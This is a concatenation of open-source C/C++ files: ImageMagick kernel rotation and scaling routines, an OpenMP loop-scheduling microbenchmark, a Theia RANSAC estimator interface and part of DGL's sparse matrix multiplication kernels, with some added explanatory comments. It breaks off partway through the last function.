if ( 22.5 < fmod(angle,90.0) && fmod(angle,90.0) <= 67.5 )
{
if ( kernel->width == 3 && kernel->height == 3 )
{ /* Rotate a 3x3 square by 45 degree angle */
double t = kernel->values[0];
kernel->values[0] = kernel->values[3];
kernel->values[3] = kernel->values[6];
kernel->values[6] = kernel->values[7];
kernel->values[7] = kernel->values[8];
kernel->values[8] = kernel->values[5];
kernel->values[5] = kernel->values[2];
kernel->values[2] = kernel->values[1];
kernel->values[1] = t;
/* rotate non-centered origin */
if ( kernel->x != 1 || kernel->y != 1 ) {
ssize_t x,y;
x = (ssize_t) kernel->x-1;
y = (ssize_t) kernel->y-1;
if ( x == y ) x = 0;
else if ( x == 0 ) x = -y;
else if ( x == -y ) y = 0;
else if ( y == 0 ) y = x;
kernel->x = (ssize_t) x+1;
kernel->y = (ssize_t) y+1;
}
angle = fmod(angle+315.0, 360.0); /* angle reduced 45 degrees */
kernel->angle = fmod(kernel->angle+45.0, 360.0);
}
else
perror("Unable to rotate non-3x3 kernel by 45 degrees");
}
if ( 45.0 < fmod(angle, 180.0) && fmod(angle,180.0) <= 135.0 )
{
if ( kernel->width == 1 || kernel->height == 1 )
{ /* Do a transpose of a 1 dimensional kernel,
** which results in a fast 90 degree rotation of some type.
*/
ssize_t
t;
t = (ssize_t) kernel->width;
kernel->width = kernel->height;
kernel->height = (size_t) t;
t = kernel->x;
kernel->x = kernel->y;
kernel->y = t;
if ( kernel->width == 1 ) {
angle = fmod(angle+270.0, 360.0); /* angle reduced 90 degrees */
kernel->angle = fmod(kernel->angle+90.0, 360.0);
} else {
angle = fmod(angle+90.0, 360.0); /* angle increased 90 degrees */
kernel->angle = fmod(kernel->angle+270.0, 360.0);
}
}
else if ( kernel->width == kernel->height )
{ /* Rotate a square array of values by 90 degrees */
{ register ssize_t
i,j,x,y;
register MagickRealType
*k,t;
k=kernel->values;
for( i=0, x=(ssize_t) kernel->width-1; i<=x; i++, x--)
for( j=0, y=(ssize_t) kernel->height-1; j<y; j++, y--)
{ t = k[i+j*kernel->width];
k[i+j*kernel->width] = k[j+x*kernel->width];
k[j+x*kernel->width] = k[x+y*kernel->width];
k[x+y*kernel->width] = k[y+i*kernel->width];
k[y+i*kernel->width] = t;
}
}
/* rotate the origin - relative to center of array */
{ register ssize_t x,y;
x = (ssize_t) (kernel->x*2-kernel->width+1);
y = (ssize_t) (kernel->y*2-kernel->height+1);
kernel->x = (ssize_t) ( -y +(ssize_t) kernel->width-1)/2;
kernel->y = (ssize_t) ( +x +(ssize_t) kernel->height-1)/2;
}
angle = fmod(angle+270.0, 360.0); /* angle reduced 90 degrees */
kernel->angle = fmod(kernel->angle+90.0, 360.0);
}
else
perror("Unable to rotate a non-square, non-linear kernel 90 degrees");
}
if ( 135.0 < angle && angle <= 225.0 )
{
/* For a 180 degree rotation - also known as a reflection.
* This is actually a very common operation!
* Basically all that is needed is a reversal of the kernel data,
* and a reflection of the origin.
*/
MagickRealType
t;
register MagickRealType
*k;
ssize_t
i,
j;
k=kernel->values;
j=(ssize_t) (kernel->width*kernel->height-1);
for (i=0; i < j; i++, j--)
t=k[i], k[i]=k[j], k[j]=t;
kernel->x = (ssize_t) kernel->width - kernel->x - 1;
kernel->y = (ssize_t) kernel->height - kernel->y - 1;
angle = fmod(angle-180.0, 360.0); /* angle reduced 180 degrees */
kernel->angle = fmod(kernel->angle+180.0, 360.0);
}
/* At this point the angle should be between -45 (315) and +45 degrees.
* In the future some form of non-orthogonal angled rotates could be
* performed here, possibly with a linear kernel restriction.
*/
return;
}
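/*
  Editor's worked example of the 45 degree step above: with the 3x3 values
  laid out in row-major order as
      1 2 3
      4 5 6
      7 8 9
  the eight outer entries rotate one position clockwise around the fixed
  center, giving
      4 1 2
      7 5 3
      8 9 6
*/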
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% S c a l e G e o m e t r y K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ScaleGeometryKernelInfo() takes a geometry argument string, typically
% provided as a "-set option:convolve:scale {geometry}" user setting,
% and modifies the kernel according to the parsed arguments of that setting.
%
% The first argument (and any normalization flags) are passed to
% ScaleKernelInfo() to scale/normalize the kernel. The second argument
% is then passed to UnityAddKernelInfo() to add a scaled unity kernel
% into the scaled/normalized kernel.
%
% The format of the ScaleGeometryKernelInfo method is:
%
% void ScaleGeometryKernelInfo(KernelInfo *kernel,
% const char *geometry)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel to modify
%
% o geometry:
% The geometry string to parse, typically from the user provided
% "-set option:convolve:scale {geometry}" setting.
%
*/
MagickExport void ScaleGeometryKernelInfo (KernelInfo *kernel,
const char *geometry)
{
MagickStatusType
flags;
GeometryInfo
args;
SetGeometryInfo(&args);
flags = ParseGeometry(geometry, &args);
#if 0
/* For Debugging Geometry Input */
(void) FormatLocaleFile(stderr, "Geometry = 0x%04X : %lg x %lg %+lg %+lg\n",
flags, args.rho, args.sigma, args.xi, args.psi );
#endif
if ( (flags & PercentValue) != 0 ) /* Handle Percentage flag*/
args.rho *= 0.01, args.sigma *= 0.01;
if ( (flags & RhoValue) == 0 ) /* Set Defaults for missing args */
args.rho = 1.0;
if ( (flags & SigmaValue) == 0 )
args.sigma = 0.0;
/* Scale/Normalize the input kernel */
ScaleKernelInfo(kernel, args.rho, (GeometryFlags) flags);
/* Add Unity Kernel, for blending with original */
if ( (flags & SigmaValue) != 0 )
UnityAddKernelInfo(kernel, args.sigma);
return;
}
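/*
  Editor's illustrative "convolve:scale" argument strings for the parser
  above (the '!' and '^' flag meanings follow the NOTE in the
  ScaleKernelInfo() documentation below; treat these as sketches, not a
  specification):
    "2"       scale all kernel values by 2.0
    "!"       normalize the kernel (rho defaults to 1.0)
    "50%!"    normalize, then scale the result by 0.5
    "1,0.25"  keep the scale at 1.0 and blend in 0.25 of a unity kernel
*/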
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% S c a l e K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ScaleKernelInfo() scales the given kernel list by the given amount, with or
% without normalization of the sum of the kernel values (as per given flags).
%
% By default (no flags given) the values within the kernel are scaled
% directly using the given scaling factor without further change.
%
% If either of the two 'normalize_flags' are given the kernel will first be
% normalized and then further scaled by the scaling factor value given.
%
% Kernel normalization ('normalize_flags' given) is designed to ensure that
% any use of the kernel scaling factor with 'Convolve' or 'Correlate'
% morphology methods will fall into -1.0 to +1.0 range. Note that for
% non-HDRI versions of IM this may cause images to have any negative results
% clipped, unless some 'bias' is used.
%
% More specifically: kernels which only contain positive values (such as a
% 'Gaussian' kernel) will be scaled so that those values sum to +1.0,
% ensuring a 0.0 to +1.0 output range for non-HDRI images.
%
% For kernels that contain some negative values, (such as 'Sharpen' kernels)
% the kernel will be scaled by the absolute value of the sum of kernel
% values, so that it will generally fall within the +/- 1.0 range.
%
% For kernels whose values sum to zero, (such as 'Laplacian' kernels) the
% kernel will be scaled by just the sum of the positive values, so that its
% output range will again fall into the +/- 1.0 range.
%
% For special kernels designed for locating shapes using 'Correlate', (often
% only containing +1 and -1 values, representing foreground/background
% matching) a special normalization method is provided to scale the positive
% values separately from the negative values, so the kernel will be
% forced to become a zero-sum kernel better suited to such searches.
%
% WARNING: Correct normalization of the kernel assumes that the '*_range'
% attributes within the kernel structure have been correctly set during the
% kernels creation.
%
% NOTE: The values used for 'normalize_flags' have been selected specifically
% to match the use of geometry options, so that '!' means NormalizeValue, '^'
% means CorrelateNormalizeValue. All other GeometryFlags values are ignored.
%
% The format of the ScaleKernelInfo method is:
%
% void ScaleKernelInfo(KernelInfo *kernel, const double scaling_factor,
% const MagickStatusType normalize_flags )
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel
%
% o scaling_factor:
% multiply all values by this factor, after any normalization
% requested by the flags has been applied.
%
% o normalize_flags:
% GeometryFlags defining normalization method to use.
% specifically: NormalizeValue, CorrelateNormalizeValue,
% and/or PercentValue
%
*/
MagickExport void ScaleKernelInfo(KernelInfo *kernel,
const double scaling_factor,const GeometryFlags normalize_flags)
{
register double
pos_scale,
neg_scale;
register ssize_t
i;
/* do the other kernels in a multi-kernel list first */
if ( kernel->next != (KernelInfo *) NULL)
ScaleKernelInfo(kernel->next, scaling_factor, normalize_flags);
/* Normalization of Kernel */
pos_scale = 1.0;
if ( (normalize_flags&NormalizeValue) != 0 ) {
if ( fabs(kernel->positive_range + kernel->negative_range) >= MagickEpsilon )
/* non-zero-summing kernel (generally positive) */
pos_scale = fabs(kernel->positive_range + kernel->negative_range);
else
/* zero-summing kernel */
pos_scale = kernel->positive_range;
}
/* Force kernel into a normalized zero-summing kernel */
if ( (normalize_flags&CorrelateNormalizeValue) != 0 ) {
pos_scale = ( fabs(kernel->positive_range) >= MagickEpsilon )
? kernel->positive_range : 1.0;
neg_scale = ( fabs(kernel->negative_range) >= MagickEpsilon )
? -kernel->negative_range : 1.0;
}
else
neg_scale = pos_scale;
/* finalize scaling_factor for positive and negative components */
pos_scale = scaling_factor/pos_scale;
neg_scale = scaling_factor/neg_scale;
for (i=0; i < (ssize_t) (kernel->width*kernel->height); i++)
if (!IsNaN(kernel->values[i]))
kernel->values[i] *= (kernel->values[i] >= 0) ? pos_scale : neg_scale;
/* convolution output range */
kernel->positive_range *= pos_scale;
kernel->negative_range *= neg_scale;
/* maximum and minimum values in kernel */
kernel->maximum *= (kernel->maximum >= 0.0) ? pos_scale : neg_scale;
kernel->minimum *= (kernel->minimum >= 0.0) ? pos_scale : neg_scale;
/* swap kernel settings if user's scaling factor is negative */
if ( scaling_factor < MagickEpsilon ) {
double t;
t = kernel->positive_range;
kernel->positive_range = kernel->negative_range;
kernel->negative_range = t;
t = kernel->maximum;
kernel->maximum = kernel->minimum;
kernel->minimum = t;
}
return;
}
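/*
  Editor's worked example of the normalization above: for the zero-summing
  3x3 Laplacian-style kernel
      -1 -1 -1
      -1  8 -1
      -1 -1 -1
  positive_range is 8 and negative_range is -8, so their sum is below
  MagickEpsilon and pos_scale falls back to the positive range (8).  With a
  scaling_factor of 1.0 every value is then divided by 8, and the kernel's
  output range becomes -1.0 to +1.0, as the documentation above promises.
*/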
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% S h o w K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ShowKernelInfo() outputs the details of the given kernel definition to
% standard error, generally due to a user's 'morphology:showkernel' option
% request.
%
% The format of the ShowKernel method is:
%
% void ShowKernelInfo(const KernelInfo *kernel)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel
%
*/
MagickPrivate void ShowKernelInfo(const KernelInfo *kernel)
{
const KernelInfo
*k;
size_t
c, i, u, v;
for (c=0, k=kernel; k != (KernelInfo *) NULL; c++, k=k->next ) {
(void) FormatLocaleFile(stderr, "Kernel");
if ( kernel->next != (KernelInfo *) NULL )
(void) FormatLocaleFile(stderr, " #%lu", (unsigned long) c );
(void) FormatLocaleFile(stderr, " \"%s",
CommandOptionToMnemonic(MagickKernelOptions, k->type) );
if ( fabs(k->angle) >= MagickEpsilon )
(void) FormatLocaleFile(stderr, "@%lg", k->angle);
(void) FormatLocaleFile(stderr, "\" of size %lux%lu%+ld%+ld",(unsigned long)
k->width,(unsigned long) k->height,(long) k->x,(long) k->y);
(void) FormatLocaleFile(stderr,
" with values from %.*lg to %.*lg\n",
GetMagickPrecision(), k->minimum,
GetMagickPrecision(), k->maximum);
(void) FormatLocaleFile(stderr, "Forming a output range from %.*lg to %.*lg",
GetMagickPrecision(), k->negative_range,
GetMagickPrecision(), k->positive_range);
if ( fabs(k->positive_range+k->negative_range) < MagickEpsilon )
(void) FormatLocaleFile(stderr, " (Zero-Summing)\n");
else if ( fabs(k->positive_range+k->negative_range-1.0) < MagickEpsilon )
(void) FormatLocaleFile(stderr, " (Normalized)\n");
else
(void) FormatLocaleFile(stderr, " (Sum %.*lg)\n",
GetMagickPrecision(), k->positive_range+k->negative_range);
for (i=v=0; v < k->height; v++) {
(void) FormatLocaleFile(stderr, "%2lu:", (unsigned long) v );
for (u=0; u < k->width; u++, i++)
if (IsNaN(k->values[i]))
(void) FormatLocaleFile(stderr," %*s", GetMagickPrecision()+3, "nan");
else
(void) FormatLocaleFile(stderr," %*.*lg", GetMagickPrecision()+3,
GetMagickPrecision(), (double) k->values[i]);
(void) FormatLocaleFile(stderr,"\n");
}
}
}
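/*
  Editor's sample of the output produced above (layout reconstructed from
  the FormatLocaleFile() calls; the actual values depend on the kernel):

    Kernel "Diamond" of size 3x3+1+1 with values from 1 to 1
    Forming an output range from 0 to 5 (Sum 5)
     0:       nan         1       nan
     1:         1         1         1
     2:       nan         1       nan
*/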
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% U n i t y A d d K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% UnityAddKernelInfo() Adds a given amount of the 'Unity' Convolution Kernel
% to the given pre-scaled and normalized Kernel. This in effect adds that
% amount of the original image into the resulting convolution kernel. This
% value is usually provided by the user as a percentage value in the
% 'convolve:scale' setting.
%
% The resulting effect is to convert the defined kernels into blended
% soft-blurs, unsharp kernels or into sharpening kernels.
%
% The format of the UnityAddKernelInfo method is:
%
% void UnityAddKernelInfo(KernelInfo *kernel, const double scale )
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel
%
% o scale:
% scaling factor for the unity kernel to be added to
% the given kernel.
%
*/
MagickExport void UnityAddKernelInfo(KernelInfo *kernel,
const double scale)
{
/* do the other kernels in a multi-kernel list first */
if ( kernel->next != (KernelInfo *) NULL)
UnityAddKernelInfo(kernel->next, scale);
/* Add the scaled unity kernel to the existing kernel */
kernel->values[kernel->x+kernel->y*kernel->width] += scale;
CalcKernelMetaData(kernel); /* recalculate the meta-data */
return;
}
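/*
  Editor's worked example: starting from the normalized 1x3 averaging kernel
      { 1/3, 1/3, 1/3 }
  UnityAddKernelInfo(kernel,1.0) adds 1.0 at the origin, giving the blended
  blur { 1/3, 4/3, 1/3 }.  Scaling the original kernel by -1.0 first and
  then adding 2.0 of unity instead yields { -1/3, 5/3, -1/3 }, which sums
  to 1.0 and acts as a simple sharpening kernel.
*/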
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% Z e r o K e r n e l N a n s %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ZeroKernelNans() replaces any special 'nan' value that may be present in
% the kernel with a zero value. This is typically done when the kernel will
% be used in special hardware (GPU) convolution processors, to simplify
% matters.
%
% The format of the ZeroKernelNans method is:
%
% void ZeroKernelNans (KernelInfo *kernel)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel
%
*/
MagickPrivate void ZeroKernelNans(KernelInfo *kernel)
{
register size_t
i;
/* do the other kernels in a multi-kernel list first */
if (kernel->next != (KernelInfo *) NULL)
ZeroKernelNans(kernel->next);
for (i=0; i < (kernel->width*kernel->height); i++)
if (IsNaN(kernel->values[i]))
kernel->values[i]=0.0;
return;
}
|
schedbench.c | /****************************************************************************
* *
* OpenMP MicroBenchmark Suite - Version 3.1 *
* *
* produced by *
* *
* Mark Bull, Fiona Reid and Nix Mc Donnell *
* *
* at *
* *
* Edinburgh Parallel Computing Centre *
* *
* email: markb@epcc.ed.ac.uk or fiona@epcc.ed.ac.uk *
* *
* *
* This version copyright (c) The University of Edinburgh, 2015. *
* *
* *
* Licensed under the Apache License, Version 2.0 (the "License"); *
* you may not use this file except in compliance with the License. *
* You may obtain a copy of the License at *
* *
* http://www.apache.org/licenses/LICENSE-2.0 *
* *
* Unless required by applicable law or agreed to in writing, software *
* distributed under the License is distributed on an "AS IS" BASIS, *
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. *
* See the License for the specific language governing permissions and *
* limitations under the License. *
* *
****************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <math.h>
#include <omp.h>
#include "common.h"
#include "schedbench.h"
int cksz, itersperthr = 8192;
char testName[32];
int main(int argc, char **argv) {
init(argc, argv);
// Also print itersperthr
printf("\t%d iterations per threads\n", itersperthr);
/* GENERATE REFERENCE TIME */
reference("reference time", &refer);
/* TEST STATIC */
benchmark("STATIC", &teststatic);
/* TEST STATIC,n */
cksz = 1;
while (cksz <= itersperthr) {
sprintf(testName, "STATIC %d", cksz);
benchmark(testName, &teststaticn);
cksz *= 2;
}
/* TEST DYNAMIC,n */
cksz = 1;
while (cksz <= itersperthr) {
sprintf(testName, "DYNAMIC %d", cksz);
benchmark(testName, &testdynamicn);
cksz *= 2;
}
/* TEST GUIDED,n */
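/* Editor's note: for schedule(guided) the chunk value is a *minimum* chunk
size, not a fixed one; chunk sizes start at roughly the remaining
iterations divided by the thread count and shrink toward this minimum,
so only minimums up to itersperthr / nthreads are interesting here. */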
cksz = 1;
while (cksz <= itersperthr / nthreads) {
sprintf(testName, "GUIDED %d", cksz);
benchmark(testName, &testguidedn);
cksz *= 2;
}
finalise();
return EXIT_SUCCESS;
}
void refer() {
int i, j;
for (j = 0; j < innerreps; j++) {
for (i = 0; i < itersperthr; i++) {
delay(delaylength);
}
}
}
void teststatic() {
int i, j;
#pragma omp parallel private(j)
{
for (j = 0; j < innerreps; j++) {
#pragma omp for schedule(static)
for (i = 0; i < itersperthr * nthreads; i++) {
delay(delaylength);
}
}
}
}
void teststaticn() {
int i, j;
#pragma omp parallel private(j)
{
for (j = 0; j < innerreps; j++) {
#pragma omp for schedule(static,cksz)
for (i = 0; i < itersperthr * nthreads; i++) {
delay(delaylength);
}
}
}
}
void testdynamicn() {
int i, j;
#pragma omp parallel private(j)
{
for (j = 0; j < innerreps; j++) {
#pragma omp for schedule(dynamic,cksz)
for (i = 0; i < itersperthr * nthreads; i++) {
delay(delaylength);
}
}
}
}
void testguidedn() {
int i, j;
#pragma omp parallel private(j)
{
for (j = 0; j < innerreps; j++) {
#pragma omp for schedule(guided,cksz)
for (i = 0; i < itersperthr * nthreads; i++) {
delay(delaylength);
}
}
}
}
|
estimator.h | // Copyright (C) 2013 The Regents of the University of California (Regents).
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following
// disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of The Regents or University of California nor the
// names of its contributors may be used to endorse or promote products
// derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
// ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDERS OR CONTRIBUTORS BE
// LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
// SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
// INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
// CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//
// Please contact the author of this library if you have any questions.
// Author: Chris Sweeney (cmsweeney@cs.ucsb.edu)
#ifndef THEIA_SOLVERS_ESTIMATOR_H_
#define THEIA_SOLVERS_ESTIMATOR_H_
#include <glog/logging.h>
#ifdef THEIA_USE_OPENMP
#include <omp.h>
#endif
#include <vector>
namespace theia {
// Templated class for estimating a model for RANSAC. This class is purely a
// virtual class and should be implemented for the specific task that RANSAC is
// being used for. Two methods must be implemented: EstimateModel and Error. All
// other methods are optional, but will likely enhance the quality of the RANSAC
// output.
//
// NOTE: RANSAC, ARRSAC, and other solvers work best if Datum and Model are
// lightweight classes or structs.
template <typename DatumType, typename ModelType>
class Estimator {
public:
typedef DatumType Datum;
typedef ModelType Model;
Estimator() {}
virtual ~Estimator() {}
// Get the minimum number of samples needed to generate a model.
virtual double SampleSize() const = 0;
// Given a set of data points, estimate the model. Users should implement this
// function appropriately for the task being solved. Returns true for
// successful model estimation (and outputs model), false for failed
// estimation. Typically, this is a minimal set, but it is not required to be.
virtual bool EstimateModel(const std::vector<Datum>& data,
std::vector<Model>* model) const = 0;
// Estimate a model from a non-minimal sampling of the data. E.g. for a line,
// use SVD on a set of points instead of constructing a line from two points.
// By default, this simply implements the minimal case.
virtual bool EstimateModelNonminimal(const std::vector<Datum>& data,
std::vector<Model>* model) const {
return EstimateModel(data, model);
}
// Refine the model based on an updated subset of data, and a pre-computed
// model. Can be optionally implemented.
virtual bool RefineModel(const std::vector<Datum>& data, Model* model) const {
return true;
}
// Given a model and a data point, calculate the error. Users should implement
// this function appropriately for the task being solved.
virtual double Error(const Datum& data, const Model& model) const = 0;
// Compute the residuals of many data points. By default this is just a loop
// that calls Error() on each data point, but this function can be useful if
// the errors of multiple points may be estimated simultaneously (e.g.,
// matrix multiplication to compute the reprojection error of many points at
// once).
virtual std::vector<double> Residuals(const std::vector<Datum>& data,
const Model& model) const {
std::vector<double> residuals(data.size());
#pragma omp parallel for
for (int i = 0; i < data.size(); i++) {
residuals[i] = Error(data[i], model);
}
return residuals;
}
// Returns the set inliers of the data set based on the error threshold
// provided.
std::vector<int> GetInliers(const std::vector<Datum>& data,
const Model& model,
double error_threshold) const {
std::vector<int> inliers;
inliers.reserve(data.size());
for (int i = 0; i < data.size(); i++) {
if (Error(data[i], model) < error_threshold) {
inliers.push_back(i);
}
}
return inliers;
}
// Enable a quick check to see if the model is valid. This can be a geometric
// check or some other verification of the model structure.
virtual bool ValidModel(const Model& model) const { return true; }
};
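// Editor's illustrative sketch (not part of the library): a minimal 2D line
// estimator implementing the two required methods.  Point and Line are
// hypothetical types introduced only for this example; the block is guarded
// out so the header is unchanged when compiled.
#if 0
#include <cmath>

struct Point { double x, y; };
struct Line { double slope, intercept; };

class LineEstimator : public Estimator<Point, Line> {
 public:
  // Two points define a line.
  double SampleSize() const override { return 2; }

  bool EstimateModel(const std::vector<Point>& data,
                     std::vector<Line>* models) const override {
    if (data.size() < 2 || data[0].x == data[1].x) return false;
    Line line;
    line.slope = (data[1].y - data[0].y) / (data[1].x - data[0].x);
    line.intercept = data[0].y - line.slope * data[0].x;
    models->push_back(line);
    return true;
  }

  // Vertical distance from the point to the line.
  double Error(const Point& point, const Line& line) const override {
    return std::abs(point.y - (line.slope * point.x + line.intercept));
  }
};
#endif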
} // namespace theia
#endif // THEIA_SOLVERS_ESTIMATOR_H_
|
spmm.h | /*!
* Copyright (c) 2020 by Contributors
* \file array/cpu/spmm.h
* \brief SPMM CPU kernel function header.
*/
#ifndef DGL_ARRAY_CPU_SPMM_H_
#define DGL_ARRAY_CPU_SPMM_H_
#include <dgl/array.h>
#include <dgl/bcast.h>
#include <limits>
#include <algorithm>
namespace dgl {
namespace aten {
namespace cpu {
/*!
* \brief CPU kernel of SpMM on Csr format.
* \param bcast Broadcast information.
* \param csr The Csr matrix.
* \param ufeat The feature on source nodes.
* \param efeat The feature on edges.
* \param out The result feature on destination nodes.
* \note It uses a node-parallel strategy: different threads are responsible
* for the computation of different nodes.
*/
template <typename IdType, typename DType, typename Op>
void SpMMSumCsr(
const BcastOff& bcast,
const CSRMatrix& csr,
NDArray ufeat, NDArray efeat,
NDArray out) {
const bool has_idx = !IsNullArray(csr.data);
const IdType* indptr = csr.indptr.Ptr<IdType>();
const IdType* indices = csr.indices.Ptr<IdType>();
const IdType* edges = csr.data.Ptr<IdType>();
const DType* X = ufeat.Ptr<DType>();
const DType* W = efeat.Ptr<DType>();
int64_t dim = bcast.out_len,
lhs_dim = bcast.lhs_len,
rhs_dim = bcast.rhs_len;
DType* O = out.Ptr<DType>();
#pragma omp parallel for
for (IdType rid = 0; rid < csr.num_rows; ++rid) {
const IdType row_start = indptr[rid], row_end = indptr[rid + 1];
DType* out_off = O + rid * dim;
for (int64_t k = 0; k < dim; ++k) {
DType accum = 0;
for (IdType j = row_start; j < row_end; ++j) {
const IdType cid = indices[j];
const IdType eid = has_idx? edges[j] : j;
const int64_t lhs_add = bcast.use_bcast ? bcast.lhs_offset[k] : k;
const int64_t rhs_add = bcast.use_bcast ? bcast.rhs_offset[k] : k;
const DType* lhs_off = Op::use_lhs? X + cid * lhs_dim + lhs_add : nullptr;
const DType* rhs_off = Op::use_rhs? W + eid * rhs_dim + rhs_add : nullptr;
accum += Op::Call(lhs_off, rhs_off);
}
out_off[k] = accum;
}
}
}
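/*!
 * \brief Editor's illustrative sketch (not part of DGL): the node-parallel
 * CSR traversal used by SpMMSumCsr above, reduced to plain arrays with the
 * copy-lhs operator, i.e. out[r] = sum of ufeat over r's incoming edges.
 * Each thread owns a distinct destination row, so no atomics are needed.
 */
#if 0
inline void SpMMSumCsrPlain(const int* indptr, const int* indices,
                            const float* ufeat, float* out, int num_rows) {
#pragma omp parallel for
  for (int rid = 0; rid < num_rows; ++rid) {
    float accum = 0.f;
    for (int j = indptr[rid]; j < indptr[rid + 1]; ++j)
      accum += ufeat[indices[j]];
    out[rid] = accum;
  }
}
#endif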
/*!
* \brief CPU kernel of SpMM on Coo format.
* \param bcast Broadcast information.
* \param coo The Coo matrix.
* \param ufeat The feature on source nodes.
* \param efeat The feature on edges.
* \param out The result feature on destination nodes.
* \note It uses an edge-parallel strategy: different threads are responsible
* for the computation of different edges. To avoid possible data hazards,
* we use atomic operators in the reduction phase.
*/
template <typename IdType, typename DType, typename Op>
void SpMMSumCoo(
const BcastOff& bcast,
const COOMatrix& coo,
NDArray ufeat, NDArray efeat,
NDArray out) {
const bool has_idx = !IsNullArray(coo.data);
const IdType* row = coo.row.Ptr<IdType>();
const IdType* col = coo.col.Ptr<IdType>();
const IdType* edges = coo.data.Ptr<IdType>();
const DType* X = ufeat.Ptr<DType>();
const DType* W = efeat.Ptr<DType>();
int64_t dim = bcast.out_len,
lhs_dim = bcast.lhs_len,
rhs_dim = bcast.rhs_len;
DType* O = out.Ptr<DType>();
const int64_t nnz = coo.row->shape[0];
// fill zero elements
memset(O, 0, out.GetSize());
// spmm
#pragma omp parallel for
for (IdType i = 0; i < nnz; ++i) {
const IdType rid = row[i];
const IdType cid = col[i];
const IdType eid = has_idx? edges[i] : i;
DType* out_off = O + cid * dim;
for (int64_t k = 0; k < dim; ++k) {
const int64_t lhs_add = bcast.use_bcast ? bcast.lhs_offset[k] : k;
const int64_t rhs_add = bcast.use_bcast ? bcast.rhs_offset[k] : k;
const DType* lhs_off = Op::use_lhs? X + rid * lhs_dim + lhs_add : nullptr;
const DType* rhs_off = Op::use_rhs? W + eid * rhs_dim + rhs_add : nullptr;
const DType val = Op::Call(lhs_off, rhs_off);
#pragma omp atomic
out_off[k] += val;
}
}
}
/*!
* \brief CPU kernel of SpMM-Min/Max on Csr format.
* \param bcast Broadcast information.
* \param csr The Csr matrix.
* \param ufeat The feature on source nodes.
* \param efeat The feature on edges.
* \param out The result feature on destination nodes.
* \param argu Arg-Min/Max on source nodes, which refers to the source node
* indices corresponding to the minimum/maximum values of the reduction
* result on destination nodes. It's useful in computing gradients of the
* Min/Max reducer.
* \param arge Arg-Min/Max on edges, which refers to the edge indices
* corresponding to the minimum/maximum values of the reduction result on
* destination nodes. It's useful in computing gradients of the Min/Max
* reducer.
* \note It uses a node-parallel strategy: different threads are responsible
* for the computation of different nodes.
*/
template <typename IdType, typename DType, typename Op, typename Cmp>
void SpMMCmpCsr(
const BcastOff& bcast,
const CSRMatrix& csr,
NDArray ufeat, NDArray efeat,
NDArray out, NDArray argu, NDArray arge) {
const bool has_idx = !IsNullArray(csr.data);
const IdType* indptr = static_cast<IdType*>(csr.indptr->data);
const IdType* indices = static_cast<IdType*>(csr.indices->data);
const IdType* edges = has_idx ? static_cast<IdType*>(csr.data->data) : nullptr;
const DType* X = Op::use_lhs? static_cast<DType*>(ufeat->data) : nullptr;
const DType* W = Op::use_rhs? static_cast<DType*>(efeat->data) : nullptr;
const int64_t dim = bcast.out_len,
lhs_dim = bcast.lhs_len,
rhs_dim = bcast.rhs_len;
